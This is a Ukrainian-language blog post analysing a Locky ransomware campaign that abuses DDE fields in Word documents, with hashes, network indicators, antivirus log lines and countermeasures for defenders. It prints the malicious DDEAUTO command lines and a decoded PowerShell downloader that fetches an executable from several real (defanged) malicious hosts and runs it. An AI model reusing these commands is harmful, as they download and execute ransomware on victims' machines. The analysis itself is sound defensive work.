DDE_Locky_311017

Доброго дня, панове.

Вчора вночі була зафіксована чергова спроба доставки Locky Ransomware через документи з DDE.

Схему активації я вже розбирав детально тому зосередимося на маркерах та контрзаходах.

Рівень загрози – усе ще високий, але не через складність атаки, а через те, що ще не всі організації вжили заходів щодо блокування DDE.

Для організацій, що прислухалися до моїх попередніх рекомендацій , рівень загрози – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що обидва payload вже детектуєються по GTI.

Нагадую, що механізм DDE може бути використаний для запуску команд не лише в Word та Excel а й у Outlook.

Користувачам McAfee VSE/ENS раджу ще раз ознайомитися із простими правилами по блокуванню DDE.

Схема атаки:

email > .doc (DDE) > запитання1? > запитання2? > CMD > powershell > GET URL list > GET payload1 > %temp%\*1.exe > GET encoded payload2 > %temp%\*2.exe

Маркери IOC:

Обидва файли що були передані на аналіз відносяться до однієї кампанії, посилання з обох ведуть на один і той самий список URL для завантаження payload1

Документ#1

File name Invoice 081839882 10.31.2017
File size 16.74 KB
SHA-256 7a81c498fa2c4bead2792bfa636d2c32f9f630b92c0aa1cceacfb5403aeb0909

містить таке поле активації Powershell через DDE

DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'h11p:\localesynavesalquiler[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1"

Документ#2

File name Invoice 091312820 10.31.2017
File size 16.73 KB
SHA-256 66c1be89ca96319d92600aefeecade28ecf312682d94846032ad8fa3635a1575

містить таке поле активації Powershell через DDE

DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'h11p:\lopezfranco[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1"

За посиланням знаходиться текст, це кодовані у base64 команди для PowerShell, фактично список посилань на проміжний payload

JAB1AHIAbABzACAAPQAgACIAaAB0AHQAcAA6AC8ALwByAG8AcwBpAGEAdQB0AG8AcwB1AGwAaQAuAGgAdQAvAEgAVQBnAGYAcgBzAGUANwAiACwAIgBoAHQAdABwADoALwAvAGMAcQBhAHEAdQBhAGwAaQB0AGUALgBjAG8AbQAvAEgAVQBnAGYAcgBzAGUANwAiACwAIgBoAHQAdABwADoALwAvAGQAaQBlAHQAZQByAGQAdQByAHMAdABpAGcALgBkAGUALwBIAFUAZwBmAHIAcwBlADcAIgAsACIAaAB0AHQAcAA6AC8ALwBlAGQAaQBmAGkAYwBpAG8AZQB4AHAAbwAuAGMAbwBtAC8ASABVAGcAZgByAHMAZQA3ACIALAAiAGgAdAB0AHAAOgAvAC8AZgBpAHIAcwB0AC0AcABhAHIAaQBzAC0AcAByAG8AcABlAHIAdABpAGUAcwAuAGMAbwBtAC8ASABVAGcAZgByAHMAZQA3ACIALAAiAGgAdAB0AHAAOgAvAC8AaABvAHQAZQBsAHgAYQBnAHUAYQB0AGUALgBjAG8AbQAvAEgAVQBnAGYAcgBzAGUANwAiAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB1AHIAbAAgAGkAbgAgACQAdQByAGwAcwApAHsADQAKAFQAcgB5AA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAHUAcgBsAAkADQAKAAkAJABmAHAAIAA9ACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdABpADQALgBlAHgAZQAiAAkADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACQAZgBwAA0ACgAJACQAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQADQAKAAkAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAZgBwACkADQAKAAkAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZgBwAA0ACgAJAGIAcgBlAGEAawANAAoAfQANAAoAQwBhAHQAYwBoAA0ACgB7AA0ACgAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlAA0ACgB9AA0ACgANAAoACQANAAoAfQA=

Якщо декодувати отримаємо:

$urls = "h11p:\rosiautosuli.hu/HUgfrse7","h11p:\cqaqualite[.]com/HUgfrse7","h11p:\dieterdurstig.de/HUgfrse7",
"h11p:\edificioexpo[.]com/HUgfrse7","h11p:\first-paris-properties[.]com/HUgfrse7","h11p:\hotelxaguate[.]com/HUgfrse7" 
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\hti4.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
   Write-Host $_.Exception.Message
}
}

Цього разу, на відміну від попередніх скрипт містить цілих 6 посилань на проміжний payload.

Для нас, з точки зору захисту систем, важливе те, що запуск цієї команди призводить до завантаження основного тіла з одної із шести переданих адрес та запис тіла у каталог %temp%

Filename      HUgfrse7      >> tmp\hti4.exe
Size            263KiB (268992 bytes)
SHA256      42c403e7c6e811938b843c9ec915b1190ab7095b1451416ba5e65ff530d6d787

Це проміжний payload, він є так званим downloader`ом. Його функція – перевірка системи на відповідність заданим параметрам.

У випадку коли параметри системи задовольняють задані критерії цей шматок коду переходить до завантаження основного тіла Locky Ransomware

hti4.exe > h11p://spooner-motorsport[.]com/UIeu6fgue63

Цей файл розшифровується проміжним payload`ом та запускається на виконання

Filename        23lfo837.exe
Size               597KiB (610816 bytes)
SHA256          ad0a072948cd6dfa2bd7aa79931b0522084ad8d2b9b4e119b4b9c6ef4a1ae89c

Після запуску відбувається процес шифрування файлів.

Зашифровані файли отримують розширення .asasin 

Цей зразок також містить механізм розповсюдження по мережі використовуючи вразливість SMB (EthernalBlue).

Тому достатньо щоб в організації знайшлася хоча би одна довірлива жертва і відсутність виправлень на MS10-017.

Детект по GTI

Робота правила Access Protection

Додаткові (вбудовані) правила Acces Protection які могли би зупинити інфікування

(перед запуском DDE навмисне були переведені в режим LogOnly)

Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\OFFICE15\WINWORD.EXE C:\WINDOWS\SYSWOW64\CMD.EXE User-defined Rules:_DDE_BLK_1(cmd) Action blocked : Read
Would be blocked by port blocking rule (rule is currently not enforced) C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Common Maximum Protection:Prevent HTTP communication 91.142.213.150:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\support C:\USERS\OPERATOR\DESKTOP\P2.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси (політики Access Protection)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження списку адрес

91.142.213.150:80 HTTP 139 localesynavesalquiler[.]com GET /kdjsw23FGS HTTP/1.1
89.140.72.153:80 HTTP 129 lopezfranco[.]com GET /kdjsw23FGS HTTP/1.1

перебір джерел проміжного payload

87.229.45.38:80 HTTP 127 rosiautosuli[.]hu GET /HUgfrse7 HTTP/1.1
216.250.115.36:80 HTTP 126 cqaqualite[.]com GET /HUgfrse7 HTTP/1.1 
88.80.210.150:80 HTTP 128 dieterdurstig[.]de GET /HUgfrse7 HTTP/1.1
94.23.221.122:80 HTTP 128 edificioexpo[.]com GET /HUgfrse7 HTTP/1.1
151.80.157.121:80 HTTP 138 first-paris-properties[.]com GET /HUgfrse7 HTTP/1.1

завантаження кодованого тіла Locky

77.72.150.42:80   HTTP 147 spooner-motorsport[.]com GET /UIeu6fgue63 HTTP/1.1

Контрзаходи:

  • Заборона створення дочірніх процесів для додатків MS Office
  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Tags: , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: